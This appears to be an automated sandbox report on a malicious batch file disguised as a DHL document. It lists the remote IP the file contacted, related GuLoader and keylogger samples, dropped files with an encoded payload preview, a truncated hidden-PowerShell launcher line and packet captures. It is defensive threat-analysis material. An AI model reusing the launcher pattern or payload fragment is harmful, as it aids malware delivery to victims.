                  https://www.mynewsbreak.me/redirect-v2?originalUrl=aHR0cHM6Ly90cmFjay5oZWFsdGh5am9pbnRhaWQuY29tL2YwYmIzYjZlLWEyZjktNDBiYy1hZTNiLWQ0YmI5NzE0OTBlNT9jYW1wYWlnbmlkPTE3OTgzMTc0Mjk5OTAxMDUwODkmZmxpZ2h0aWQ9MTc5ODMxODI1NDM3OTExNDQ5NyZjcmVhdGl2ZWlkPTE3OTgzMjIxNzg0MjQ1NzgwNDkmdGlkPW5ld3NicmVha18xNzk4MzE3NDI5OTkwMTA1MDg5XzE3OTgzMTgyNTQzNzkxMTQ0OTdfMTc5ODMyMjE3ODQyNDU3ODA0OSZjbGlja2lkPW52c3NfMDkyODBlYmFmNTEwNDgyZmJkZGRkZjg4N2VhOWE0ZThfMTc5ODMyMjE3ODQyNDU3ODA0OSZpc19ub3ZhPXRydWUmbmJfY2lkPTA5MjgwZWJhZjUxMDQ4MmZiZGRkZGY4ODdlYTlhNGU4XzE3OTgzMjIxNzg0MjQ1NzgwNDk%3D&bucket=dmg_local_email_bucket_18&message_id=qk4YypJ-1SsY65wP&tag=subscribed&exps=nl_bucket_exp_24_2-v3%2Cnl_monetization_24_2-control%2Cnl_prerollout_24_2-v1%2Cnova_traffic_exp_full_09-v26&event_name=emailLinkClick&hashed_email=bb7f633dc30a2a97e85bd33fed777bd2a3f9c2541b52eb64ff345914e50393a5&email_domain=minotsbs.com&meta=eyJzdWJzX3RvcGljIjogImxvY2FsIiwgImZyZXEiOiAiZGFpbHkiLCAic2VuZF90cyI6IDE3MjA5NTkxNzcsICJsaW5rIjogIlNzS3hBQUJpIiwgInBvcyI6ICJsb2dvIiwgImFkX2lkIjogIjE3OTgzMjIxNzg0MjQ1NzgwNDkiLCAibm92YV9zbmFwc2hvdF9pZCI6ICIwOTI4MGViYWY1MTA0ODJmYmRkZGRmODg3ZWE5YTRlOF8xNzk4MzIyMTc4NDI0NTc4MDQ5In0%3DGet hashmaliciousUnknownBrowse
                  • 103.211.216.55
                  rTransaction_ReceiptCopy.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                  • 103.211.216.55
                  Purchase Order -JJ023639PDF.scr.exeGet hashmaliciousUnknownBrowse
                  • 103.211.216.55
                  Brnesde.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                  • 103.211.216.55
                  37f463bf4616ecd445d4a1937da06e19start1.batGet hashmaliciousUnknownBrowse
                  • 185.83.114.124
                  Health records + X- ray (2).batGet hashmaliciousUnknownBrowse
                  • 185.83.114.124
                  SecuriteInfo.com.Trojan.NSIS.Injector.28272.29476.exeGet hashmaliciousGuLoader, RedLineBrowse
                  • 185.83.114.124
                  Brnesde.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                  • 185.83.114.124
                  NewOrder_LCL240887.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                  • 185.83.114.124
                  Makrokdernes.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                  • 185.83.114.124
                  doc20240715-00014.bat.exeGet hashmaliciousGuLoaderBrowse
                  • 185.83.114.124
                  setup.exeGet hashmaliciousUnknownBrowse
                  • 185.83.114.124
                  setup.exeGet hashmaliciousUnknownBrowse
                  • 185.83.114.124
                  SecuriteInfo.com.W32.Kryptik.CI.tr.21358.1519.exeGet hashmaliciousUnknownBrowse
                  • 185.83.114.124

                  Dropped Files

                  No context

                  Created / dropped Files

                  C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                  Download File
                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  File Type:data
                  Category:modified
                  Size (bytes):11608
                  Entropy (8bit):4.8908305915084105
                  Encrypted:false
                  SSDEEP:192:6xoe5qpOZxoe54ib4ZVsm5emd5VFn3eGOVpN6K3bkkjo5xgkjDt4iWN3yBGHVQ9R:9rib4Z1VoGIpN6KQkj2qkjh4iUxsT6YP
                  MD5:DD89E182EEC1B964E2EEFE5F8889DCD7
                  SHA1:326A3754A1334C32056811411E0C5C96F8BFBBEE
                  SHA-256:383ABA2B62EA69A1AA28F0522BCFB0A19F82B15FCC047105B952950FF8B52C63
                  SHA-512:B9AFE64D8558860B0CB8BC0FA676008E74F983C4845895E5444DD776A42B584ECE0BB1612D8F97EE631B064F08CF5B2C7622D58A3EF8EF89D199F2ACAEFA8B52
                  Malicious:false
                  Reputation:moderate, very likely benign file
                  Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

                  C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                  Download File
                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):64
                  Entropy (8bit):1.1940658735648508
                  Encrypted:false
                  SSDEEP:3:Nlllulbnolz:NllUc
                  MD5:F23953D4A58E404FCB67ADD0C45EB27A
                  SHA1:2D75B5CACF2916C66E440F19F6B3B21DFD289340
                  SHA-256:16F994BFB26D529E4C28ED21C6EE36D4AFEAE01CEEB1601E85E0E7FDFF4EFA8B
                  SHA-512:B90BFEC26910A590A367E8356A20F32A65DB41C6C62D79CA0DDCC8D95C14EB48138DEC6B992A6E5C7B35CFF643063012462DA3E747B2AA15721FE2ECCE02C044
                  Malicious:false
                  Preview:@...e................................................@..........

                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_drlxzusf.lnu.psm1

                  Download File
                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  File Type:ASCII text, with no line terminators
                  Category:dropped
                  Size (bytes):60
                  Entropy (8bit):4.038920595031593
                  Encrypted:false
                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                  Malicious:false
                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_g0t5l42n.d4g.ps1

                  Download File
                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  File Type:ASCII text, with no line terminators
                  Category:dropped
                  Size (bytes):60
                  Entropy (8bit):4.038920595031593
                  Encrypted:false
                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                  Malicious:false
                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lmh5ct4f.13y.psm1

                  Download File
                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  File Type:ASCII text, with no line terminators
                  Category:dropped
                  Size (bytes):60
                  Entropy (8bit):4.038920595031593
                  Encrypted:false
                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                  Malicious:false
                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_swyuor0u.rdj.ps1

                  Download File
                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  File Type:ASCII text, with no line terminators
                  Category:dropped
                  Size (bytes):60
                  Entropy (8bit):4.038920595031593
                  Encrypted:false
                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                  Malicious:false
                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)

                  Download File
                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):6221
                  Entropy (8bit):3.7360410460421316
                  Encrypted:false
                  SSDEEP:48:ZcNMccLPr3C4U28IjPukvhkvklCywCgmdd6xDlR4SogZoL096xDl44SogZoLg1:eZc33CxHIakvhkvCCtE6xDZHz6xD6Hn
                  MD5:82DD9C04BA4E66C88E3786F6161829F4
                  SHA1:D9C8D518DB4DE42D7472F11C8A6826ADA9B42E5A
                  SHA-256:8372739C05818C3143FC820B00D145A5D9656F78946BACAE042E62D6F710F281
                  SHA-512:0EA19C3A1A501CB29BF92FB30DC277C1B5C0DAB6160A558E56E409269BFA12FD48150AB249FF68E9323DCD24CFF5B8EE3D19112AB507B8E458E982CB1532C92D
                  Malicious:false
                  Preview:...................................FL..................F.".. ...-/.v....k.%.....z.:{.............................:..DG..Yr?.D..U..k0.&...&......vk.v....94......E.,.........t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^.X.|...........................%..A.p.p.D.a.t.a...B.V.1......X.|..Roaming.@......CW.^.X.|..............................R.o.a.m.i.n.g.....\.1.....DW.N..MICROS~1..D......CW.^.X.|..........................9D..M.i.c.r.o.s.o.f.t.....V.1.....DWQ`..Windows.@......CW.^DWQ`..............................W.i.n.d.o.w.s.......1.....CW.^..STARTM~1..n......CW.^DW.`....................D.....=X..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DW.N..Programs..j......CW.^DW.`....................@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......CW.^DW.`..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......CW.^.X.|....Q...........

                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\5ONL2C4HZZVOYYRG42YX.temp

                  Download File
                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):6221
                  Entropy (8bit):3.7360410460421316
                  Encrypted:false
                  SSDEEP:48:ZcNMccLPr3C4U28IjPukvhkvklCywCgmdd6xDlR4SogZoL096xDl44SogZoLg1:eZc33CxHIakvhkvCCtE6xDZHz6xD6Hn
                  MD5:82DD9C04BA4E66C88E3786F6161829F4
                  SHA1:D9C8D518DB4DE42D7472F11C8A6826ADA9B42E5A
                  SHA-256:8372739C05818C3143FC820B00D145A5D9656F78946BACAE042E62D6F710F281
                  SHA-512:0EA19C3A1A501CB29BF92FB30DC277C1B5C0DAB6160A558E56E409269BFA12FD48150AB249FF68E9323DCD24CFF5B8EE3D19112AB507B8E458E982CB1532C92D
                  Malicious:false
                  Preview:...................................FL..................F.".. ...-/.v....k.%.....z.:{.............................:..DG..Yr?.D..U..k0.&...&......vk.v....94......E.,.........t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^.X.|...........................%..A.p.p.D.a.t.a...B.V.1......X.|..Roaming.@......CW.^.X.|..............................R.o.a.m.i.n.g.....\.1.....DW.N..MICROS~1..D......CW.^.X.|..........................9D..M.i.c.r.o.s.o.f.t.....V.1.....DWQ`..Windows.@......CW.^DWQ`..............................W.i.n.d.o.w.s.......1.....CW.^..STARTM~1..n......CW.^DW.`....................D.....=X..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DW.N..Programs..j......CW.^DW.`....................@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......CW.^DW.`..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......CW.^.X.|....Q...........

                  C:\Users\user\AppData\Roaming\Nedprioriterende200.Sig

                  Download File
                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  File Type:ASCII text, with very long lines (65536), with no line terminators
                  Category:dropped
                  Size (bytes):483164
                  Entropy (8bit):5.955312288027208
                  Encrypted:false
                  SSDEEP:6144:2AKs41fNGidkTmO7uS/e57DM5IEcFw9lVM2DwYBgOUzMVX7odatKpfSrv+B+l+4V:E1F9h2GBwyTtfeSpCq8mRppe
                  MD5:1677E735A9686765F8679AED9CFED513
                  SHA1:B3CD1EEB26E53BBC721E9A7CE43B5C42B50A70E8
                  SHA-256:67F3E09EF042703FE0741BDDC9BA1614ECC1DE6BA22901386161C284287670CB
                  SHA-512:EBD107C73DDFA92F39736DA5A2BF982543DD6CB6FBF52A0CF297AA92373A2747E160C5581B1397162F175A2EEC01A15A09CD337DA61CE7667BB51A8523276FF1
                  Malicious:false
                  Preview:cQGb6wJqrbsDoBkA6wJ2a3EBmwNcJARxAZvrAnEIuUoWw3RxAZtxAZuB8RrQ0dbrAr7XcQGbgelQxhKi6wLRzHEBm+sCrdFxAZu6wpp3qesCC3brAjHQ6wKf+XEBmzHKcQGbcQGbiRQL6wJPHnEBm9HicQGbcQGbg8EEcQGbcQGbgfm9glQFfM5xAZvrAhgii0QkBHEBm+sCPgSJw+sC5FNxAZuBw5SbJAVxAZvrAmAhusVHLVBxAZtxAZuB8lpwFmBxAZtxAZuB6p83OzDrAvKx6wKu1nEBm+sCgs9xAZtxAZuLDBBxAZtxAZuJDBPrAjoWcQGbQusCla5xAZuB+nwXBQB11+sCQYdxAZuJXCQMcQGbcQGbge0AAwAAcQGb6wJfTotUJAjrAowl6wJpPIt8JARxAZvrAoVuietxAZtxAZuBw5wAAABxAZvrAoB8U3EBm3EBm2pAcQGbcQGbievrAsWp6wIQG8eDAAEAAAAwcQXrAhescQGbgcMAAQAAcQGb6wI0TVNxAZtxAZuJ6+sCTIrrAmH3ibsEAQAAcQGbcQGbgcMEAQAA6wKhuXEBm1NxAZtxAZtq/+sCKmvrAicVg8IF6wIffHEBmzH2cQGb6wKuujHJ6wIorHEBm4sa6wLMwXEBm0FxAZtxAZs5HAp19HEBm3EBm0brAu5ocQGbgHwK+7h133EBm+sCpjWLRAr86wKIlnEBmynwcQGb6wJL3//S6wLDOesC4IC6fBcFAHEBm3EBmzHAcQGb6wIDbot8JAzrAoS36wKyeIE0B8yCNA7rAp8ZcQGbg8AE6wKA6usCJUI50HXj6wKgYOsCJkGJ+3EBm+sC6uH/1+sCjHhxAZswC9GPIHvLBcwD8PcwiTRbRWeN2XtFSI896JWnqAPd9hDSDo8lLw0TEgf/yYiPNGK/bwWPiI80e41jL4+gjzRx1E85igwDWAPM4KgPjOQN3kU/XwzMgotVqOTINwYDw8nDUXOPO82jLbsC

                  Static File Info

                  General

                  File type:ASCII text, with very long lines (6499), with no line terminators
                  Entropy (8bit):5.298423304882913
                  TrID:
                    File name:rDHL_PT563857935689275783656385FV-GDS3535353.bat
                    File size:6'499 bytes
                    MD5:60186cd9a2e82835bc143c1fb4662b7e
                    SHA1:880c7f14743f9759b30bcc28085949122f54c20e
                    SHA256:b66081b0e5dfe21e03d1043700d7c05e65bda96ad33a6370c374217d5ae84405
                    SHA512:98ca66c502178601cf1d568fb4b5ef122564f548eae2c82c9979207ea69398212f2b35571f3cc0696ec9edb70174a016c00ddd12fc26140d63196188e6f0f8b7
                    SSDEEP:192:jOJVeUYLAKLt+IS0y+80TJco4Ga5y0p8te:QeAKZZS280FL3aw0aE
                    TLSH:40D16D29DFD28F944ED353916C8A9F4B3F5C382E4E84A925FD8902C5A031C3237DD698
                    File Content Preview:start /min powershell.exe -windowstyle hidden "write 'Reactualizations rentvisten Exploder gawkihood urtesupper Indstrmme Guitars147 Acuity Trvaren Talefrihed Aktivitetspdagogikker Ubehjlpsommes Moutler Croise178 Mandigt Blindtarmsoperation Laeder titre B

                    File Icon

                    Icon Hash:9686878b929a9886

                    Network Behavior

                    Network Port Distribution

                    TCP Packets

                    TimestampSource PortDest PortSource IPDest IP
                    Jul 15, 2024 17:37:01.454257965 CEST49730443192.168.2.4103.211.216.55
                    Jul 15, 2024 17:37:01.454288006 CEST44349730103.211.216.55192.168.2.4
                    Jul 15, 2024 17:37:01.454370975 CEST49730443192.168.2.4103.211.216.55
                    Jul 15, 2024 17:37:01.461488962 CEST49730443192.168.2.4103.211.216.55
                    Jul 15, 2024 17:37:01.461505890 CEST44349730103.211.216.55192.168.2.4
                    Jul 15, 2024 17:37:02.431796074 CEST44349730103.211.216.55192.168.2.4
                    Jul 15, 2024 17:37:02.431864977 CEST49730443192.168.2.4103.211.216.55
                    Jul 15, 2024 17:37:02.435523033 CEST49730443192.168.2.4103.211.216.55
                    Jul 15, 2024 17:37:02.435533047 CEST44349730103.211.216.55192.168.2.4
                    Jul 15, 2024 17:37:02.435861111 CEST44349730103.211.216.55192.168.2.4
                    Jul 15, 2024 17:37:02.447546005 CEST49730443192.168.2.4103.211.216.55
                    Jul 15, 2024 17:37:02.492532015 CEST44349730103.211.216.55192.168.2.4
                    Jul 15, 2024 17:37:03.026375055 CEST44349730103.211.216.55192.168.2.4
                    Jul 15, 2024 17:37:03.026446104 CEST44349730103.211.216.55192.168.2.4
                    Jul 15, 2024 17:37:03.026508093 CEST49730443192.168.2.4103.211.216.55
                    Jul 15, 2024 17:37:03.026530981 CEST44349730103.211.216.55192.168.2.4
                    Jul 15, 2024 17:37:03.080496073 CEST49730443192.168.2.4103.211.216.55
                    Jul 15, 2024 17:37:03.274068117 CEST44349730103.211.216.55192.168.2.4
                    Jul 15, 2024 17:37:03.274101019 CEST44349730103.211.216.55192.168.2.4
                    Jul 15, 2024 17:37:03.274230957 CEST44349730103.211.216.55192.168.2.4
                    Jul 15, 2024 17:37:03.274252892 CEST44349730103.211.216.55192.168.2.4
                    Jul 15, 2024 17:37:03.274657965 CEST49730443192.168.2.4103.211.216.55
                    Jul 15, 2024 17:37:03.274682045 CEST44349730103.211.216.55192.168.2.4
                    Jul 15, 2024 17:37:03.274955034 CEST49730443192.168.2.4103.211.216.55
                    Jul 15, 2024 17:37:03.275113106 CEST44349730103.211.216.55192.168.2.4
                    Jul 15, 2024 17:37:03.275579929 CEST49730443192.168.2.4103.211.216.55
                    Jul 15, 2024 17:37:03.276112080 CEST44349730103.211.216.55192.168.2.4
                    Jul 15, 2024 17:37:03.276201963 CEST49730443192.168.2.4103.211.216.55
                    Jul 15, 2024 17:37:03.528076887 CEST44349730103.211.216.55192.168.2.4
                    Jul 15, 2024 17:37:03.528096914 CEST44349730103.211.216.55192.168.2.4
                    Jul 15, 2024 17:37:03.528321981 CEST44349730103.211.216.55192.168.2.4
                    Jul 15, 2024 17:37:03.528512001 CEST49730443192.168.2.4103.211.216.55
                    Jul 15, 2024 17:37:03.528536081 CEST44349730103.211.216.55192.168.2.4
                    Jul 15, 2024 17:37:03.528709888 CEST49730443192.168.2.4103.211.216.55
                    Jul 15, 2024 17:37:03.528709888 CEST49730443192.168.2.4103.211.216.55
                    Jul 15, 2024 17:37:03.529431105 CEST44349730103.211.216.55192.168.2.4
                    Jul 15, 2024 17:37:03.529808998 CEST49730443192.168.2.4103.211.216.55
                    Jul 15, 2024 17:37:03.530256033 CEST44349730103.211.216.55192.168.2.4
                    Jul 15, 2024 17:37:03.530332088 CEST49730443192.168.2.4103.211.216.55
                    Jul 15, 2024 17:37:03.539683104 CEST44349730103.211.216.55192.168.2.4
                    Jul 15, 2024 17:37:03.539799929 CEST44349730103.211.216.55192.168.2.4
                    Jul 15, 2024 17:37:03.539880991 CEST44349730103.211.216.55192.168.2.4
                    Jul 15, 2024 17:37:03.539901972 CEST49730443192.168.2.4103.211.216.55
                    Jul 15, 2024 17:37:03.539901972 CEST49730443192.168.2.4103.211.216.55
                    Jul 15, 2024 17:37:03.539922953 CEST44349730103.211.216.55192.168.2.4
                    Jul 15, 2024 17:37:03.539954901 CEST49730443192.168.2.4103.211.216.55
                    Jul 15, 2024 17:37:03.560579062 CEST44349730103.211.216.55192.168.2.4
                    Jul 15, 2024 17:37:03.560661077 CEST49730443192.168.2.4103.211.216.55
                    Jul 15, 2024 17:37:03.560668945 CEST44349730103.211.216.55192.168.2.4
                    Jul 15, 2024 17:37:03.611654043 CEST49730443192.168.2.4103.211.216.55
                    Jul 15, 2024 17:37:03.768659115 CEST44349730103.211.216.55192.168.2.4
                    Jul 15, 2024 17:37:03.768784046 CEST44349730103.211.216.55192.168.2.4
                    Jul 15, 2024 17:37:03.768858910 CEST49730443192.168.2.4103.211.216.55
                    Jul 15, 2024 17:37:03.768882990 CEST44349730103.211.216.55192.168.2.4
                    Jul 15, 2024 17:37:03.768901110 CEST49730443192.168.2.4103.211.216.55
                    Jul 15, 2024 17:37:03.768929958 CEST49730443192.168.2.4103.211.216.55
                    Jul 15, 2024 17:37:03.769686937 CEST44349730103.211.216.55192.168.2.4
                    Jul 15, 2024 17:37:03.769762039 CEST49730443192.168.2.4103.211.216.55
                    Jul 15, 2024 17:37:03.770410061 CEST44349730103.211.216.55192.168.2.4
                    Jul 15, 2024 17:37:03.770489931 CEST49730443192.168.2.4103.211.216.55
                    Jul 15, 2024 17:37:03.774246931 CEST44349730103.211.216.55192.168.2.4
                    Jul 15, 2024 17:37:03.774317026 CEST49730443192.168.2.4103.211.216.55
                    Jul 15, 2024 17:37:03.774386883 CEST44349730103.211.216.55192.168.2.4
                    Jul 15, 2024 17:37:03.774452925 CEST49730443192.168.2.4103.211.216.55
                    Jul 15, 2024 17:37:03.774930954 CEST44349730103.211.216.55192.168.2.4
                    Jul 15, 2024 17:37:03.774993896 CEST49730443192.168.2.4103.211.216.55
                    Jul 15, 2024 17:37:03.775433064 CEST44349730103.211.216.55192.168.2.4
                    Jul 15, 2024 17:37:03.775500059 CEST49730443192.168.2.4103.211.216.55
                    Jul 15, 2024 17:37:03.775697947 CEST44349730103.211.216.55192.168.2.4
                    Jul 15, 2024 17:37:03.775763035 CEST49730443192.168.2.4103.211.216.55
                    Jul 15, 2024 17:37:03.776746035 CEST44349730103.211.216.55192.168.2.4
                    Jul 15, 2024 17:37:03.776808023 CEST49730443192.168.2.4103.211.216.55
                    Jul 15, 2024 17:37:03.859014034 CEST44349730103.211.216.55192.168.2.4
                    Jul 15, 2024 17:37:03.859153986 CEST44349730103.211.216.55192.168.2.4
                    Jul 15, 2024 17:37:03.859292984 CEST49730443192.168.2.4103.211.216.55
                    Jul 15, 2024 17:37:03.859292984 CEST49730443192.168.2.4103.211.216.55
                    Jul 15, 2024 17:37:03.859317064 CEST44349730103.211.216.55192.168.2.4
                    Jul 15, 2024 17:37:03.859365940 CEST49730443192.168.2.4103.211.216.55
                    Jul 15, 2024 17:37:03.859813929 CEST44349730103.211.216.55192.168.2.4
                    Jul 15, 2024 17:37:03.859889030 CEST49730443192.168.2.4103.211.216.55
                    Jul 15, 2024 17:37:03.859961987 CEST44349730103.211.216.55192.168.2.4
                    Jul 15, 2024 17:37:03.860028028 CEST49730443192.168.2.4103.211.216.55
                    Jul 15, 2024 17:37:03.860738039 CEST44349730103.211.216.55192.168.2.4
                    Jul 15, 2024 17:37:03.860810995 CEST49730443192.168.2.4103.211.216.55
                    Jul 15, 2024 17:37:03.860866070 CEST44349730103.211.216.55192.168.2.4
                    Jul 15, 2024 17:37:03.860929966 CEST49730443192.168.2.4103.211.216.55
                    Jul 15, 2024 17:37:04.025629044 CEST44349730103.211.216.55192.168.2.4
                    Jul 15, 2024 17:37:04.025697947 CEST44349730103.211.216.55192.168.2.4
                    Jul 15, 2024 17:37:04.025904894 CEST49730443192.168.2.4103.211.216.55
                    Jul 15, 2024 17:37:04.025924921 CEST44349730103.211.216.55192.168.2.4
                    Jul 15, 2024 17:37:04.025985003 CEST49730443192.168.2.4103.211.216.55
                    Jul 15, 2024 17:37:04.026007891 CEST44349730103.211.216.55192.168.2.4
                    Jul 15, 2024 17:37:04.026083946 CEST49730443192.168.2.4103.211.216.55
                    Jul 15, 2024 17:37:04.026648998 CEST44349730103.211.216.55192.168.2.4
                    Jul 15, 2024 17:37:04.026727915 CEST49730443192.168.2.4103.211.216.55
                    Jul 15, 2024 17:37:04.027379990 CEST44349730103.211.216.55192.168.2.4
                    Jul 15, 2024 17:37:04.027457952 CEST49730443192.168.2.4103.211.216.55
                    Jul 15, 2024 17:37:04.027574062 CEST44349730103.211.216.55192.168.2.4
                    Jul 15, 2024 17:37:04.027647018 CEST49730443192.168.2.4103.211.216.55
                    Jul 15, 2024 17:37:04.028207064 CEST44349730103.211.216.55192.168.2.4
                    Jul 15, 2024 17:37:04.028278112 CEST49730443192.168.2.4103.211.216.55
                    Jul 15, 2024 17:37:04.028409958 CEST44349730103.211.216.55192.168.2.4
                    Jul 15, 2024 17:37:04.028467894 CEST49730443192.168.2.4103.211.216.55
                    Jul 15, 2024 17:37:04.029051065 CEST44349730103.211.216.55192.168.2.4
                    Jul 15, 2024 17:37:04.029113054 CEST49730443192.168.2.4103.211.216.55
                    Jul 15, 2024 17:37:04.031404972 CEST44349730103.211.216.55192.168.2.4
                    Jul 15, 2024 17:37:04.031482935 CEST49730443192.168.2.4103.211.216.55
                    Jul 15, 2024 17:37:04.031781912 CEST44349730103.211.216.55192.168.2.4
                    Jul 15, 2024 17:37:04.031847954 CEST49730443192.168.2.4103.211.216.55
                    Jul 15, 2024 17:37:04.032182932 CEST44349730103.211.216.55192.168.2.4
                    Jul 15, 2024 17:37:04.032253981 CEST49730443192.168.2.4103.211.216.55
                    Jul 15, 2024 17:37:04.034580946 CEST44349730103.211.216.55192.168.2.4
                    Jul 15, 2024 17:37:04.034661055 CEST49730443192.168.2.4103.211.216.55
                    Jul 15, 2024 17:37:04.034939051 CEST44349730103.211.216.55192.168.2.4
                    Jul 15, 2024 17:37:04.035002947 CEST49730443192.168.2.4103.211.216.55
                    Jul 15, 2024 17:37:04.035357952 CEST44349730103.211.216.55192.168.2.4
                    Jul 15, 2024 17:37:04.035420895 CEST49730443192.168.2.4103.211.216.55
                    Jul 15, 2024 17:37:04.035870075 CEST44349730103.211.216.55192.168.2.4
                    Jul 15, 2024 17:37:04.035936117 CEST49730443192.168.2.4103.211.216.55
                    Jul 15, 2024 17:37:04.036021948 CEST44349730103.211.216.55192.168.2.4
                    Jul 15, 2024 17:37:04.036081076 CEST49730443192.168.2.4103.211.216.55
                    Jul 15, 2024 17:37:04.105695009 CEST44349730103.211.216.55192.168.2.4
                    Jul 15, 2024 17:37:04.105928898 CEST44349730103.211.216.55192.168.2.4
                    Jul 15, 2024 17:37:04.105978966 CEST44349730103.211.216.55192.168.2.4
                    Jul 15, 2024 17:37:04.106046915 CEST49730443192.168.2.4103.211.216.55
                    Jul 15, 2024 17:37:04.106046915 CEST49730443192.168.2.4103.211.216.55
                    Jul 15, 2024 17:37:04.106046915 CEST49730443192.168.2.4103.211.216.55
                    Jul 15, 2024 17:37:04.106070042 CEST44349730103.211.216.55192.168.2.4
                    Jul 15, 2024 17:37:04.106117964 CEST44349730103.211.216.55192.168.2.4
                    Jul 15, 2024 17:37:04.106182098 CEST49730443192.168.2.4103.211.216.55
                    Jul 15, 2024 17:37:04.106190920 CEST44349730103.211.216.55192.168.2.4
                    Jul 15, 2024 17:37:04.106672049 CEST44349730103.211.216.55192.168.2.4
                    Jul 15, 2024 17:37:04.106749058 CEST49730443192.168.2.4103.211.216.55
                    Jul 15, 2024 17:37:04.106755972 CEST44349730103.211.216.55192.168.2.4
                    Jul 15, 2024 17:37:04.107172966 CEST44349730103.211.216.55192.168.2.4
                    Jul 15, 2024 17:37:04.107240915 CEST49730443192.168.2.4103.211.216.55
                    Jul 15, 2024 17:37:04.107249022 CEST44349730103.211.216.55192.168.2.4
                    Jul 15, 2024 17:37:04.107923985 CEST44349730103.211.216.55192.168.2.4
